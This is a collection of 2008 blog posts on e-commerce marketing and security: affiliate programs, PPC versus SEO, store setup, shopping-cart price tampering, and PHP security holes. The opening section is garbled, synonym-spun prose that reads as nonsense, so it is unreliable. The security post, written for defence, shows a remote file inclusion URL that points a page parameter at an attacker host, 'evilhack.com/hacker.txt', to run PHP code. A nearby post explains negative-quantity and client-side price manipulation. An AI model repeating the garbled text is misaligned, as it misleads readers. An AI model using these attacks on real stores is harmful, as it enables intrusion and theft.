On a daily basis there are persons who determine to ask us queries similar to, “What’s taking place on TV tonight?” or else “Do you be acquainted with what the assets of Connecticut exist?” or else “How do you actually speak Lancaster, Pennsylvania?”

What astonishes us is there exist an occasion as soon as we would have referred to turn out periodical to reply these queries. It would also be a TV index, chart, information book or else vocabulary.

In the present day we squander a hardly any moments online during my preferred search engine as well as make the counter we require as of a diversity of causes. We obtain to decide which resource we put which has mainly faith within.

If our kid is boasting complexity through their training plus they inquire us to assist, we are able to usually discover supplemental resources online to aid them - plus ourselves.

If we encompass difficulty concerning levy act we can locate information lying on the network.

If we merely wish for to be acquainted with what’s in concert on TV at one specified moment there are only some options to discover accurately what strength of character will be on our system. Those substitutes will be originated online.

This is actuality during the 21st century. Several may perhaps describe this information as overwork, nevertheless designed for persons who require to be acquainted with them are most frequently rotating to the Internet for reply.

As a big business proprietor, how will the drumming hook on that ‘necessitate to be acquainted with’ way of thinking of our consumers? What are we doing online so as to will assist them to understand our item for consumption enhanced?

There’s not anything of inferior quality than for a gently aggravated customer to visit an ecommerce location and discover something that gives the impression attractive, however after that foliages them in the dim concerning what the manufactured goods be able to perform.

They are judging, “gentleman, we actually be fond of that Whatzit, excluding we are not sure if it’s a can opener or else a tidy whacker used by pests.”

The humankind broad netting has turn out to be the leading resource for information. Inside the 21st century citizens are persuaded that being talented to right of entry information whilst they wish the information is very important. Customers have approached to wait for the nearness of information and manufactured goods ease of use.

Why Residual Affiliate Programs Is The Best To Promote

Wednesday 28 May 2008 @ 5:05 pm

Are you a webmaster in need of additional income? Or are you planning to set up an online business but you still don’t have any product to sell? If so, affiliate marketing may be the best solution for your problems. With affiliate marketing, you won’t need to worry about the products you have to sell. All you need to have is a website with sufficient contents that are related to the products of a certain online company offering affiliate programs. By becoming a member of the program, or by becoming an affiliate, you can start earning a certain amount of money right away!

Affiliate marketing is some sort of business relationship established between a merchant and his affiliates. In affiliate marketing, an affiliate agrees to direct some traffic to a merchant’s website. If that traffic is converted into some kind of action, like a visitor purchasing a product on the merchant’s website or a visitor becoming a lead for the company, the affiliate who directed the traffic will be compensated. Compensation may take the form of either a percentage sales commission for the sales generated or a fixed fee predetermined upon the application of the affiliate on the merchant’s affiliate program.

Promising a lot of benefits both for the merchants and the affiliates, affiliate marketing has become one of the most popular online marketing methods today. In fact, almost every merchant or retailer site today offers an affiliate program that any one can join into. Most retailers would entice people to become affiliates or members of their program by promising great benefits like large commissions, lifetime commissions, click through incomes and a lot of other benefits. But would all these affiliate programs bring off the same benefits?

Most affiliate programs would pay you, as an affiliate, a one-time commission for every sale or lead you brought to the merchant’s website. Commissions for this kind of affiliate programs are usually large, ranging from 15% to a high of about 60%. Other affiliate programs would pay you a fixed fee for every click through or traffic you send to the merchant’s site. Programs like this often pay a smaller fee for every click through, usually not getting any larger than half a dollar. The good thing about this kind of program, however, is that the visitor won’t have to purchase anything in order for the affiliate to get compensated.

Another type of affiliate program is the residual income affiliate program. Residual affiliate programs usually pay only a small percentage of sales commission for every sale directed by the affiliate to the merchant’s site. This commission often comes only in the range of 10% to 20% sales commission. Because of this, many people ignore residual affiliate program and would rather opt for the high paying one-time commission affiliate program. Are these people making a mistake, or are they making the right decision?

We can’t tell, for sure, if people are making a mistake by choosing a high paying one-time commission affiliate program. But we can definitely say that they are making a large mistake if they ignore residual affiliate programs. Residual affiliate programs would indeed pay at a lower rate, but merchants offering such kind of programs would generally pay you regular and ongoing commissions for a single affiliate initiated sale! That means, for the same effort you made in promoting a particular affiliate program, you get paid only once in a one-time commission program, and a regular and ongoing commission for a residual program!

So, are the benefits of promoting residual affiliate programs clearer to you now? Or are they still vague? If they are still vague, then let’s make them a bit clearer with this example.

Suppose there are two online merchants both offering web hosting services on their sites. The first merchant offers a one-time commission type of affiliate program that pays $80 for every single affiliate initiated sale. The second merchant also offers an affiliate program, but this time a residual affiliate program that pays only $10 for every single affiliate initiated sale. As an affiliate, we may get attracted at once at what the first merchant is offering, as $80 is definitely a lot larger than $10. But by thinking things over before actually getting into them, one may be able to see that the second merchant is offering us more opportunity to earn a larger amount of money.

Supposed you have directed traffic to the merchant and it converted into a sale, you’ll get paid once by the first merchant for the sale you have initiated. But with the second merchant, you’ll get paid monthly for as long as the customer you have referred to the merchant continues to avail of the web hosting service. That means that for the same effort of getting one customer to avail of the merchant’s service, you get paid monthly in residual affiliate programs while you only get paid once in a one-time commission type of affiliate programs.

So, are residual affiliate programs worth promoting? Definitely yes, because you virtually get more money from these types of affiliate programs in the long run! And would residual affiliate programs work best for you? Probably not, probably yes. It is not really for me to tell. But with the benefits that residual affiliate marketing can provide, it would really be unwise to ignore such programs.

PPC or Organic Search Which one should I use?

Wednesday 28 May 2008 @ 5:05 pm

by Christopher Cartre
PPC aka Sponsored Search is the fastest way to achieve online visibility for relevant keywords. PPC is actually paid advertising specific to keywords. Google’s PPC model is called “Adwords.” Competing advertiser’s use Google’s bidding model to bid for specific keywords. Winning bidders (advertisers) will have their ad (adtext and title) displayed when searchers use the search engine for that keyword. The number of times the ad is displayed is controlled by a number of factors including ad budget of the advertiser, the times of the day the advertiser wishes for the ad to run and the “quality score” of the ad as measured by Google. Don’t worry about Quality Score for now as you don’t need a high score to start. It becomes more important over time and can positively or negatively affect where you are listed within the Sponsored Search area.

Most importantly, with a successful bidding strategy for all of your relevant keywords and properly written ad title and text, you can achieve immediate visibility for your products and services. This is the overriding and major advantage of PPC advertising. You don’t have to do anything to your website.

Other Key Advantages of PPC:
1. Instant Management — it can be controlled instantly. You can turn off ads and turn them on a whim if you wish. You can change your budget, time of day the ads will appear.
2. Easy to monitor and track results — every impression (display), every click is registered.
3. You pay only for the clicks. Not for the impressions.
4. You can calculate your cost per lead, cost per sale or cost per “anything you deem as a successful result of a website visit” … CONVERSION.

Drawbacks of PPC:
1. Can be very expensive, especially over time.
2. Searchers prefer Organic Results by more than 2:1 over Sponsored Results. This means search results generate clicks in the organic area twice as many times as in Sponsored Search … i.e. less than 1 in 3 click in the Sponsored area.
3. Cost is variable as successful bidders pay different amounts per click to gain the highest listing in the search area.
4. You can get outbid and lose visibility. So, the model forecasts increasing advertising costs as a certainty.
5. Risk of click fraud, although Google is doing their best to be very vigilant about this. However it remains a real and potent risk.

Organic Search Engine Optimization (SEO)

Organic SEO is the “John Houseman” of Internet Marketing. The results you see in the green-shaded area are “earrrrrrned.” In other words, these listings are not advertisements. They are simply listings that have been indexed and RANKED FOR RELEVANCE based on the complex algorithms and technology of the search engines. This is how Google has achieved its dominance; by creating a system whereby searchers can easily and efficiently find what they are looking for and be on their way.
So these results have to be earned. By definition, there is no guarantee of success (being listed in the first 3 pages of a search).
However, if successful, you can achieve the following key benefits:
1. Twice the likelihood of being clicked vs. PPC.
2. No charge at all no matter how many times the listing is clicked.
3. The listing will stay there 24 hours a day for as long as the Google spiders rank the site as being more relevant than those behind you in the rankings.
4. Better long term strategy for high rankings as costs are much lower and click-through rates are much higher.

The Negatives
1. Not immediate, not guaranteed and not easy to attain. Try any search and look at the blue horizontal stripe two thirds up the page. You will see the number of competing web pages for that specific term. You will see thousands to 10’s of millions of competing web pages for that keyword phrase.
2. Requires expertise developed in-house or hired through a professional Internet Marketing Company with specific and demonstrated skill and success producing high search engine results.
3. High Professional Commitment is required to generate textual content to develop backlinks (direct inbound links pointing directly into corresponding content within the website itself).
4. It’s Expensive! This is not a trivial or easy process or set of skills. Getting to page 1 (first 10 listings) out of 100’s of thousands of competing pages or more should make that clear.
5. It takes time … the process does not generate results in days or weeks. It can take as much as 6-12 months to generate real results visible for all to see.

I purposely included more negatives than positives. It’s important that you understand the level of commitment and the reality of the tasks involved.

However, the benefits are enormous. You are easily found by a “motivated buyer” … after all, the searcher decided what to search for and when to do it … where can you find a more motivated prospect in any other medium? All actions are initiated by the buyer and your are the receiver of the interaction. Very powerful, indeed.

So, I told you to use BOTH … why?
Both have advantages. Our clients will typically, upon our advice, use PPC as a short to mid-term strategy while ongoing organic SEO is “in the oven.” As SEO results become visible and tangible, PPC budgets are trimmed and eliminated depending on the client’s situation. PPC is generally continued at a lower level over the long term to promote a brand or trademark, protect a brand or trademark, gain more visibility to be seen by 100% of the searchers regardless of preference.

So PPC is the Sprint … Organic SEO is the Marathon. However, they both can work together in a well-coordinated online strategy.

E-commerce is the online mode of doing businesses wherein people sell their products/services to potential customers all across the globe through Internet. Some of the most popular e-Commerce websites are such as Amazon.com and eBay, and these two in fact comprises the major chunk of the e-Commerce market shares. However, e-Commerce is not the sole province of only the large
companies. There are numerous success stories all over, of many small business enterprises which have made considerable success selling of their goods/services over the Internet.

There are however, some essential requirements to mark your e-Commerce presence. First is the website of course. And since it is a platform to connect your business with your customers, the website needs to have some extra features which generally are not found in typical websites. For instance, an e-Commerce website will need: a shopping cart, product catalog/archives, search facilities, credit card processing capability etc.

One can easily avail all of these features and many more as per their requirements through web hosting and web design firms. These firms can provide highly customized e-Commerce website that blends in perfect with clients’ business.

Why go Online?

A person doing business over the years certainly would not like to get confined to just a region or some specific targeted area. In e-Commerce business. With Internet, possibilities are limitless. One can reach to people anywhere across the globe and at any time, with the least possible cost. They can easily get access to new customers, foray into newer territories and get an already build platform for advertisements, without having the need to pay extra for making all of these possible.

Your plans to sell online can create thriving opportunities with least costs compared to the offline mode of doing businesses. You can probably run a whole online store simply sitting at your home instead of renting a retail space. You save yourself from the overhead costs and the other management worries of running an offline business. You can mark yourself available 24/7 without even hiring employees to make that happen. Foremost of all, your business and all the necessary transactions are safe and secured.

It is important to Chose the right e-Commerce Vendor

Choosing the best e-Commerce website package takes in account of various other factors. First is, the kind of business a person is into, the products/services they sell and the targeted audience for their businesses. Other customizable features etc comes next. The package should also take care of the optimization needs of any e-Commerce website, because one thing is for certain — Today, without optimization it takes luck to boost your online presence.

Watch out! E-Shoplifters About!

Wednesday 28 May 2008 @ 9:05 am

by Paul R
We’re all heard about the cost to a business of shoplifting, how a certain percentage of a shops retail stock will disappear without ever going out through the till. Thieves head into a store, look out for hidden weaknesses in the environment and walks off with an unknown amount of merchandise, all without getting detected. It’s a really simple thing to do for those with no conscience, but surely in this electronic age, this can’t happen with e-commerce websites? Wrong! Unfortunately this can happen in a minority of cases, but it is preventable.

What many business fail to understand in these Internet days, are that a poorly constructed e-commerce website can enable electronic shoplifting in the Internet age.

With the Paypal “Buy Now” buttons, they are really convenient if you are selling a small quantity of products where generally only one type of product is bought at a time. Unfortunately if they are not setup correctly, they create an easy way for a user to modify the HTML code and edit this to whatever they like. There is a quite a large proportion of these buttons that fit this category. The problem in most cases is easily rectified. When creating a button, you have the option of making the button encrypted or normal. By encrypting the code for the button and changing your setup to accept encrypted payments only, the problem is eliminated.

For shopping carts, when entering the quantity of a product when it is added to the shopping cart there are two different methods to input a quantity, or edit one in the shopping cart - drop down menus or edit boxes. Drop down menus are fine, though they lack the flexibility of an edit box (an edit box can have any quantity, a pulldown menu only has preset quantities) though they are faster. But the edit box, unless it has any form of server side validation on the entered value, this can cause a potential problem. If a user already has some items in the shopping cart, then enters a negative quantity this will produce a credit instead of a debit, and not only does the user get the item for free, he/she will also receive a credit on the cost of that particular item. Though for a small order this could be noticed, unfortunately with a large order this could easily get missed. Though the number of websites this can be performed on is decreasing over the last few years, it still is a problem, particularly for older e-commerce websites or websites developed by the unwary or inexperienced.

A third area where e-shoplifting can be performed again is with poorly designed data control. Typically the costs of items on a website are held on a database, and the required cost is then retrieved when each product page is displayed in a web browser. The user purchases an item, and places this into the shopping cart, then proceeds to the checkout and then purchases the items. This arrangement is fine, only if the prices are again retrieved from the database for both the shopping cart and the checkout. However if the e-commerce site is poorly designed and the prices are passed from the user back to the shopping cart and checkout, this causes a problem as the user can save the webpages to a hard disk and easily modify the prices through the HTML or Javascript code. With this information being passed back to the storeowner, the owner has no control over these prices, and again e-shoplifting can occur. As above, this particularly affects older e-commerce sites, which are constructed in this way.

If you are an e-commerce storeowner your site falls into one of the above three categories then you do have a potential problem.

The first problem is easy to spot by checking the HTML code for you Paypal button.

The second problem is also easy to spot and to rectify by adding some server side validation coding, however the third problem is a bit harder to spot, and easily could go unnoticed. This is quite a bit more difficult to fix. If you are unable to fix some of these problems, the best option would be to keep alert on your orders and have in yours “Terms of Use” a note prohibiting data modification, otherwise you might have a difficult time fighting this one in court.

Making Search Engine Friendly E-commerce Websites

Wednesday 28 May 2008 @ 8:05 am

by Paul R
Just imagine you had a birthday party, you cleaned up your house, put your best clothes on, got the cake out, put up your decorations and got all that food and drink out. Prior to this you sent out your coloured invitations on glossy paper, but at the last minute, there, under a pile of papers and a rather dozy sleeping cat. Shock! Horror! You realise you forgot to send out your invitations!

And as the big night comes, only a handful of guests came. The rest just verbally were aware you were having a party, but couldn’t work out how to get there and gave up sitting at home or made other plans instead.

It’s a bit like that when it comes to e-commerce, we sometimes just assume our visitors are coming to our site, after all we submitted our website to all the search engines and got numerous backlinks. Yet we haven’t gone the extra mile to tell our friendly search engine spider where we live.

This is especially true also for e-commerce websites, as these are generally dynamically generated webpages, it seems that most are not particularly search engine friendly or search engine optimized, that the masses may not be getting through. Its not like the masses are not there, they’ve just made alternative plans.

Tips for getting your e-commerce search engine friendly & search engine optimized:

The search engine spider needs to crawl through the site to index all the webpages. These webpages need to be presented to the search engines without a session ID and a query string. Also the product title should be in the filename for greater search engine success. A webpage address of http://www.mysite.com/productid=12456&search=t&PHPSESSID=da7946bbcd7673b5706d412da79bbfeb is not likely to be picked up in all the search engines, as the session ID will change with each individual visitor (and could end up with 100’s of variations of that webpage). But http://www.mysite.com/coffee_table_1234.php will. This can be achieved through direct hyperlinks through to the webpages or by using a dynamically created sitemap.

The title tags are one of the biggest factors in determining search engine success. Yet as most e-commerce sites are dynamically generated, there are many sites where the title tag is the same of all the product pages. Between the “<title>” and “</title>” tags should be the product title, with the most important details followed by typically the model no. The same relevant details should be added for both category and static webpages within the site.

Each product, category & static webpage should individual Meta tags. Your e-commerce should allow you to enter individual meta tags for each product, or automatically create them from the product title & description. Though the majority of search engines grab information from the webpage, rather than the meta tags, the reality is that some engines still do use this information.

With these enhancements built into your e-commerce software, your e-commerce website has a much better chance of exposure in the search engines, have all your webpages indexed and accordingly will push up sales.

E-Commerce Security - Plugging the Security Holes

Wednesday 28 May 2008 @ 8:05 am

by Paul R
Security in an e-commerce website needs to be a major consideration when developing an e-commerce website or software. A developer needs to be aware of all the security considerations when designing a site. With e-commerce becoming more commonplace these days, the number of security attacks is certainly increasing. Paranoia is a healthy thing for e-commerce site developers, we need to keep up to gate with security issues, and keep our ears and eyes open. Though the following loopholes are serious, the following loopholes if present are easily fixed.

Listed below are some security considerations to be included when developing a site. This article does not cover e-shoplifting, please see my separate article on this.

User input — every input, whether it be entering a quantity, searching for a product, entering a name etc, needs to be validated for suspicious characters. If this is not done, it is possible to enter “?>”, the closing end tags of PHP and execute some PHP code.

It is far safer allow numbers and characters a-z (capitals included) & 0-9 and nothing else, rather than make a list of all the character that shouldn’t be there. The validation script needs to scroll through each character one by one. This needs to be achieved using in server side validation, not Javascript. Using server side input validation is essential to keep out unwanted characters

There exists another major when executing PHP code. When using PHP there is a setting called allow_url_fopen which enables the opening of files from a PHP script. This setting should be turned off, unless absolutely necessary.

Just imagine you have PHP scripts for both fixed headers and footers, and to access your webpages you would type in http://www.mysite.com/index.php?page=page2. All it takes is a malicious user to run a script by modifying these parameters by typing in “http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt” with some PHP code in the file “hacker.txt”. You could have anything happen, PHP files read, deleted, vital information stolen.

If you are not sure if this setting is on or off, please copy the following PHP code into a text file, and upload it to your web server:

<?php
phpinfo();
?>

When you access your script on your webserver, you should come across the setting allow_url_fopen under configuration.

A computer user, under normal circumstances cannot find the value of this setting.

Be careful of exported data like orders, products in CSV & mySQL files. If this data is exported from a script and is kept on the web server under a common file name ie. http://www.mysite.com/admin/output_tables.csv. This is only really a problem when the exported data resides in a file in a directory that is publicly accessible. There is two ways to prevent this security loophole — First have the output file behind a password protected directory, secondly have the data located inside a HTML textarea form element on a script. The storeowner can then copy this information from the textfile and create a new file on their computer and paste the information here.

All it takes is a hacker to find this filename by checking out the e-commerce software’s demo website and look for the same filename on a real site.
